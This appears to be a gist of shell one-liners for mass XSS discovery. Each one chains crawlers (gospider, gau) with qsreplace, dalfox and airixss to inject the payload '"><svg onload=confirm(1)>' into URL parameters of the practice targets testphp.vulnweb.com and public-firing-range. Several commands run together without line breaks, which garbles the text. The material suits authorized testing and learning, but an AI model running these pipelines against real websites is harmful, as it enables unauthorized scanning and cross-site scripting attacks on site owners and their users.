#cat targets_urls.txt
http://public-firing-range.appspot.comgospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
- https://github.com/jaeles-project/gospider
- https://github.com/tomnomnom/qsreplace
- https://github.com/hahwul/dalfox
You can add the following useful commands to the list.
gospider -s http://testphp.vulnweb.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|swf|js)" --other-source | grep -e "code-200" | awk '{print $5}'|grep "testphp.vulnweb.com" | grep "=" | qsreplace -a |dalfox pipe -o dalfox.txtgospider -s http://testphp.vulnweb.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|swf|js)" --other-source | grep -e "code-200" | awk '{print $5}'|grep "testphp.vulnweb.com" | grep "=" | qsreplace -a |qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt,swf,js testphp.vulnweb.com --mc 200,500 --fp|grep "=" | qsreplace -a |dalfox pipe -o dalfox.txtgau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt,swf,js testphp.vulnweb.com --mc 200,500 --fp|grep "=" | qsreplace -a |qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt,swf,js testphp.vulnweb.com|grep '='|nilo|qsreplace -a |qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not
